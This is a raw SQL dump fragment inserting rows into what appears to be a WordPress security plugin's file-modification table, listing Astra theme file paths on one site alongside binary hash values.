('GÕ2¦Û%ãžìŠ‹Ú|u', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*/2#¾”ƒñ?Ða×ü¬{', '@ç† ä’›Ëí×)þÄÉÏWFò~pVÂõ‹žæR#\\', '', 0, '?'),
('=c(a©ˆÿ‰È“{V', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w~/\0×¸öÄXü\0jô8', 'èU	¦?uº©ÚU7éðv­}=™]0Ä±úæÓÙbü¡', '', 0, '?'),
('Õ:š½ZZá–•†»í', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(¢žÌÛñÀkñœKÌæ', 'WÞpÌ5á8 ±1ÝÅvÊ$™†”¼ÿAù% "úž2•', '', 0, '?'),
('A¼p­¸¶ÒÞ	âdô$', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-†‰Jhïõ¡ï¦*0BåÏ', 'TLW>”zzpeÔ.J ?JFŸ5ÅˆaoØá†Òâ', '', 0, '?'),
('K„¤ù|¦Ì˜Cçv¾ vÂ', 'wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^°­¿ë–¾1Ñ<>“ïT½', 'ï¯=O²h£Œµ¼ñ\n×!Ö‰Éñh©V58‹’', '', 0, '?'),
('ÖÂÞ5ÂöR£ŽcgÔñL·', 'wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G‰Þ*Û7‹†²•a(>«R', '$ ¿Ðy²Š¡StŸÉä+Æp¢šYl1òWÖ\n”)ºæ', '', 0, '?'),
('kPöIª¬ô•)•i[#È', 'wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'AgW(<fÖ¦)\nkÔ³Š', '	°ßµ¿!c®wòÄÃc»¾Gþf6ºHãà~6Û¤', '', 0, '?'),
('ÔÿƒF¸h™ëšaËÊÃp¢%', 'wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­û^ë_P\0tÈlÌ£.\n', '"¡ó³ çxþ2ÿÃŸºSò¦’_üc×øüó', '', 0, '?'),
('ßRÙuú-¦æªb«Î·', 'wp-content/themes/astra/inc/builder/type/header/primary-header/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥\n`N¦;,4+"5ŸéO&', 'Â…@D÷;µÍ ¸è•“\Z›õ¥z}r’)fµÚ', '', 0, '?'),
('óH¬U‹\Zôr)¦$fFr3', 'wp-content/themes/astra/inc/builder/type/header/search/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢Ñ<|Ú¬''É/ÃØÀXw', '‚¢¡bàçò”ÞhË\\	gm^gyjm«.•–4T”ðí', '', 0, '?'),
('!Á4’’;s‰,¥¯††C½&', 'wp-content/themes/astra/inc/builder/type/header/search/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'T1ïóÁŠÅü¦ëO‰Àe', 'ÿîISn óÕ?9ÎñŒ{èÌ|_;žh›?e0{ƒ-Š', '', 0, '?'),
('UÌT½±+TÝ}È@”û³Ò', 'wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Nýê#éÒÈà˜›h	14', '–t87¥ú5¼Ç7ÝeŠÿÜ¶ø‰äËè¥P•_°×ç', '', 0, '?'),
('_"$[áuþZeÛâvC²U', 'wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñÚÕÉ&XSä\núxŸ¬}µ', 'ï”®¬(le3Hû›éì«²òÈ°têx«`6', '', 0, '?'),
('ÀÙº|/ígc}˜žNK	', 'wp-content/themes/astra/inc/builder/type/header/search/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'A æÒ§4ÙwrÀî[ªÀ', '?	¦ç>½l€¤dõP?ãpn	šdm\\Ý#ŸÜjíÿCëd', '', 0, '?'),
('É¼Q‡‹Ö­ƒô…éJs/S', 'wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ñµ|NƒÁdPd U(U¤', 'çs¦QåÁÿŠ5WÙgíÛ÷T\\š­‚ˆã‚m¡T¡õ', '', 0, '?'),
('5¢îWŠzÛ?ùÐÜ|A4-', 'wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹‘:ƒFÕ—Ä»µªå²Ãq', '^\0Psx.Ë˜à ¸ì“Dz-!ãC?F¬øi€.]Ay§\rˆ', '', 0, '?'),
('Öþ''L‹¿¥Š1Ùž6±', 'wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡rJa~6c³÷Çà', 'C|ÁúxüÚÚ‡Â¸úßzê£Ÿ;|æ³1¾‡', '', 0, '?'),
('.ºã§é¾?Â·h8¯k', 'wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²(y­ÙÙÍ\\«yfF', '\ZŽ«-\0¸]	0½+mê=4×ˆ4im~•¯ÂÑ«[-!', '', 0, '?'),
('Ì£…š«èC„ÿqJò4«¸Ž', 'wp-content/themes/astra/inc/builder/type/header/site-identity/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q9?5³%ÓDE{Qž”C ', '‡_ûuM_»†±ùµ­ÄÉ†9,§Ì>7Æjl Mñ*W³=', '', 0, '?'),
('êþël¯nKÕq€×»…6cœ', 'wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ehí±»±h‡	5¥=|', 'q­$9ü¨fˆpož­h›%Qòjyë\nT]};', '', 0, '?'),
(' Y±T>Ñ v:ùçhÕ', 'wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µ=†8HÁ>‡Ks/ñgëí™', 'p Ò­Xxpc‰xµ=Ç¾Tÿ0ÝÕ*¬yéJrÍ”Vê', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('`êfé8§ç½;tçdÓ', 'wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒX¬ó¥€ÿ¶,0''\r³e', 'æžéŒ:4]£Š½tîZ@üoMËáöÕäƒ ¹Nª8‚Î', '', 0, '?'),
('¯´ÿÐSmíôÚæ†‹<', 'wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“\n¿¬''‘Ÿþ¾t/7', 'qlõ1¨7£2Ê¨.Ã½«Õì›èæƒåAßŒux˜+Ã', '', 0, '?'),
('Ð ôn¢":ß•@²Œ¹ãã', 'wp-content/themes/astra/inc/builder/type/header/social-icon/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'mŠ÷\0ðõ*~L¼øÐrw«', '>"Úyp9¨åMˆiÀ#ØhÖZ±ð&5”¨Éû.À', '', 0, '?'),
('d‘ÞÖŽá›Ënm¯9’ó', 'wp-content/themes/astra/inc/builder/type/header/widget/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'R•Ø´ªd~aà™\Z—GÓ§„', 'Ü×"çÁ”FÇ¡-ÕÜ¨9š‘žüxC¹]A*¨#÷ßù0', '', 0, '?'),
('ó­vPë·<ø>Ëk¼qhhd', 'wp-content/themes/astra/inc/builder/type/header/widget/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'sÌC‹o8€?ý+ÉÛvj—', 'Mzsê„—zöXäðzF•ì¿\n0(5˜©ŽÌïC', '', 0, '?'),
('E¬Ø_ÃÖ÷''Áµ…*^', 'wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É4æg/)á¦\Zw	è', '‡¾<NTý\neÑçÙîYáÅiy•±¿è×nÌzS[ž', '', 0, '?'),
('Y”–ñØ6µÙð7Êy!', 'wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ïW›šL‰Ðb¶šÉ=%Ñì', '/1\\Å‡²$›ö»S4—†Ts1DÏºtäZ4¨ÑÕŒ', '', 0, '?'),
('a6ˆFb3£Ëy¢¶«IÊ‘Â', 'wp-content/themes/astra/inc/builder/type/header/widget/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+\0†cŠ\05>ô/þ&qŠ', '£ãF„Øò9¥ÀIôÂ‹Îdà„_Œ#¾½í=ÑcµY¶­@', '', 0, '?'),
('VÉlW¾®y«Úe†DÞ_', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×k¥ûQB¢Öf›V5ŽÈ', 'Çüy££q×õá³]4ˆ³ª­‰Ï½ZJ#¨*nÐ’/¨', '', 0, '?'),
('lëq|»	b½(PŸþ', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'jÕò¶Ÿæj=õÞ—šÛó8t', '÷À=]2ˆ…j•EäôkÉ¨iÆÓó4¶\0UÍ''¼¨N', '', 0, '?'),
('ïE‚f$½¢x \0''æ', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']ð''¶8DØŽX5¢gºé', '—¸÷[kâ¡0g''ÛÇˆÌ-Ô·#§å…†7dX:– bší', '', 0, '?'),
('âÈ›†·ÜÁ°“*ªÇÔú', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\nI®¾=è=qi¼¬ƒéÞ3w', '¼ˆ4úÚ†»¥D¶é¾€üDŒNœZ»ùØ		Í', '', 0, '?'),
('»Î5a=Cçádð4ÀB¿‡÷', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{Ù¡Eù_\n«Ÿ]ö2Š', 'wá,|ƒ½ ‚:IôZi#\r,’R“µ?/`À¿@', '', 0, '?'),
('ÍŽû‚9š±´éY<ÇÏ ', 'wp-content/themes/astra/inc/class-astra-after-setup-theme.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-after-setup-theme.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K~ç­"\rƒ‚1øQòñ5)', '¸¹-±OÌjdàNÁèê<QÉ®ðÅÿ¿Þ’Ðõ»sé@', '', 0, '?'),
('î0TðŸ¯~tþ×(mœ!', 'wp-content/themes/astra/inc/class-astra-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÌXwáxµEÈÓóþøY', 'BgUg´‘§äF/¡;Á¶E	\nÁJ;9p|2Æ0', '', 0, '?'),
('\r®ÿI»zjkã‚Y@_', 'wp-content/themes/astra/inc/class-astra-extended-base-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-extended-base-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýA¼øþ†ñc)Ûžç´', 's(`ÊS5ã²æ~ÜøgfcŸ57ü[’ÎWðéØ', '', 0, '?'),
('­iXI:uÁŽ7Ú‹¯Lb', 'wp-content/themes/astra/inc/class-astra-global-palette.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-global-palette.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Z¨Ã[À¶j‹7e\n\0Ø{', 'b:¶$í°l.·º­<Ÿˆßáû$ÿ˜ºc]Q²¥—èaí', '', 0, '?'),
('»/Tr:k…2!M«JRÔ§', 'wp-content/themes/astra/inc/class-astra-loop.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-loop.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­­e*<îãG¹Üx@]r', ':óšªÚxµ6zRø	¢©ÕÝ#žˆSª/\ZµøÈÝ±5', '', 0, '?'),
('á¢ÈŠ”™¼‡·¬XÇ=', 'wp-content/themes/astra/inc/class-astra-mobile-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-mobile-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â%‚¦àþŠšº ~“2»nª', '5Tê#¼W ^{ÙŽÅjÔ†0”ný‰â#Æ2¹QÏ', '', 0, '?'),
('øïÉ²úÓ¯ð¥Ø¬ÅÞÖ', 'wp-content/themes/astra/inc/compatibility/class-astra-amp.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-amp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þö¶Ù–ÅgØššk…üã<', 'ÄJƒØÏ—¯¦iêŠî„\r¢ZÍŸ´³YxîçY¨7L?', '', 0, '?'),
('JüæÄ¡BT“Ípèv,{', 'wp-content/themes/astra/inc/compatibility/class-astra-bb-ultimate-addon.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-bb-ultimate-addon.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“æç,7R/´\\%v[×ú', '÷ÔhØÁA¶zü:n(5òå_1¶«ÒÄÃ˜¼©	˜¢».þ', '', 0, '?'),
('sãÂ²_ž“BiÏA)$u', 'wp-content/themes/astra/inc/compatibility/class-astra-beaver-builder.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-beaver-builder.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Â˜NeíA(¹ÓÄÁ¥Â)', '‡_ù¨Á°á¦lÎ\0ât-ºþï„?GÞÞTþöäÒüª˜˜', '', 0, '?'),
('Cé[‘W÷»•µº5‹t[l', 'wp-content/themes/astra/inc/compatibility/class-astra-beaver-themer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-beaver-themer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ïþ*}1Ë\ngº¬\\­w', '¨]©óÞ\0+™''fò¨Xtƒx¿œ½ÈŽ³''”5ñú²', '', 0, '?'),
('ów¸~[GjÖ6ÒS§Š#', 'wp-content/themes/astra/inc/compatibility/class-astra-bne-flyout.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-bne-flyout.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žÎØãòø¦m¬w]¯3ú', 'ŠÌ½}Ip+úT£¢4Â~¾t¢UÖEIÐ«.Ýr', '', 0, '?'),
('aUÌ•UÒ|2™pI®vuìy', 'wp-content/themes/astra/inc/compatibility/class-astra-contact-form-7.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-contact-form-7.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÑoyËäÚ«;Í•Œì?\n¸', 'P¿%Âq)¦œæ›}‡î_:ÿ×]]#öwS—P–™E-"Üâ', '', 0, '?'),
('§¼á/þh¸7”pÈÇ6š', 'wp-content/themes/astra/inc/compatibility/class-astra-divi-builder.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-divi-builder.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ò–HæiÏg¢\r7 É|', '6ˆ*qÃ¯ŽûÅ¯Ýî†\\Óáöqó™ÇÆŽ¼ÖÔi', '', 0, '?'),
(']¡›f»òÙ¥ñ–Jä‘é', 'wp-content/themes/astra/inc/compatibility/class-astra-elementor-pro.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-elementor-pro.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\ZÁW5ù¦ /<,6]', 'BƒízÐ>îæÑp£¨ˆäÚðbvç $hÿbî)Ob„â', '', 0, '?'),
('YÂæ›÷%N\0cxNÀïzÃt', 'wp-content/themes/astra/inc/compatibility/class-astra-elementor.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-elementor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9ÃÉu³—£	Qþÿ[—', 'kxUjÓ1\0n%¦ ’\\Þd¢ÆÍZÏ', '', 0, '?'),
('u{åxå}üµL½å(PÊî', 'wp-content/themes/astra/inc/compatibility/class-astra-gravity-forms.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-gravity-forms.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gòc¡ÅZ0©g0E7½)E', ' ¦Ñ&¢ë\ZÌ‹ÀÅ˜)ë¿¥®]í‚tU¿‘Ï', '', 0, '?'),
('M1N›6=ë¢¡S×cçV', 'wp-content/themes/astra/inc/compatibility/class-astra-gutenberg.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-gutenberg.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'lŽ)c?öÛ4šµmz''', '9ëMdÛŠ›ÛŒm·ïwŽCªU?èJøî9O°ì’', '', 0, '?'),
('QB€Ì„íÔÛ"E¹ÀÎNÄ_', 'wp-content/themes/astra/inc/compatibility/class-astra-jetpack.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-jetpack.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^ÜgRWlÑß*µ03Eº*²', 'Ã"ÔC¡šv™)Z:ªß•9Fñlvykújzù¾;9ú¿', '', 0, '?'),
('šË­Ëo.¡ÿž8ìfYr', 'wp-content/themes/astra/inc/compatibility/class-astra-site-origin.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-site-origin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D4àðqL<[@AÍ)qò|', 'â!''¥CÈÿ¤È''ïa@T"@Ú–÷…+Þ¦nj\r3', '', 0, '?'),
('}IòØ¤³ .Û%¬+<Ü', 'wp-content/themes/astra/inc/compatibility/class-astra-starter-content.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-starter-content.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eµXÒ¤{éÁGa#hD^‘Ä', 'F½‘½Þëä/èÏt=ó;Út\\Û†òŸuë~>£…ØH¼', '', 0, '?'),
('Pçq^â=n"Ê.k#·', 'wp-content/themes/astra/inc/compatibility/class-astra-surecart.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-surecart.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'zíŽþ2½²¿W+Š©', '£RÐ¿éDŒ8²²Ê½‘±8¦°3‰oçÿÎG¥‘ýâ', '', 0, '?'),
('‰uqKæÏ9°Æ6ƒ¤‹CÜ', 'wp-content/themes/astra/inc/compatibility/class-astra-ubermeu.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-ubermeu.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Kªyü`)\\D8ÍÒ”B', '•-ôð²$6ï•ÔíÃ˜Ã&Ó¨ÛPÔyªô@DRëS', '', 0, '?'),
('%áíw÷èÎ±Ç5DžO¤¡', 'wp-content/themes/astra/inc/compatibility/class-astra-visual-composer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-visual-composer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'R¼oäO¦56jlC˜mV', '¡’»™í]|£†Bq“¦V?{}¦‹&^g‹¿Ù;ÿ', '', 0, '?'),
('Êr]2HÉxß¬Ô''”‡', 'wp-content/themes/astra/inc/compatibility/class-astra-web-stories.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-web-stories.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[ÃÊ‰ïIë*²K‘äPf2', 'ÆÛÓÊLlQÙá`ï_±¸XÈºQ{qÄ%ŽCÿpfÁñîú', '', 0, '?'),
('s}‰õ±ž\reÑ‡ƒ2´iò', 'wp-content/themes/astra/inc/compatibility/class-astra-yoast-seo.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-yoast-seo.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm47ðc‡B4Ïá(áò›ÞÖ', '2/¦ø\\T£F1…í)ÙÃ»Ç³nÍ&Ÿ–¿¯æDÉ]½	', '', 0, '?'),
('çI¦O›²ËYÝy½~D›', 'wp-content/themes/astra/inc/compatibility/edd/class-astra-edd.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/class-astra-edd.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6¾¤3‚@¡ºNÓ~’', 'BO1U,''$ˆKèî+àÚÎú)/î''H·ùŒ“ËUü', '', 0, '?'),
('èµcÇýS~?<–Ê®Ó%', 'wp-content/themes/astra/inc/compatibility/edd/customizer/class-astra-customizer-register-edd-section.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/class-astra-customizer-register-edd-section.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áMþQbÓ8Vš È4>òT', 'c!hüO:@¸M!”øÁlµýºÞß®$}âµ˜¬7›´R', '', 0, '?'),
('Gf8Œ4ßéŒ‚Ûxf$	J', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-container-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-container-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›ö2`¨ÕÕšxçÔnïŸN', 'Â_ð[¬\0MðAÎÄÿ]Œ×¶¨Œ,ónª·ßI—Ö¶þ', '', 0, '?'),
('[5DÛôº·¤3ÇËVÓ9b', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-sidebar-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-sidebar-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡Ê®ÀìZÜ}¹DÏ', 'Å‰v‚þ‹2µÜÿæ*û\nÂáªl¸ŒAç€Ù§Å', '', 0, '?'),
('ÊÊ½ºýÊõîæ4bß;Š', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-archive-layout-configs.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-archive-layout-configs.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fos$c÷P·‘PR w{ý', '¡91Gü¬By¾úœå\n2oxUí1<²LÞÌ_ËÖ', '', 0, '?'),
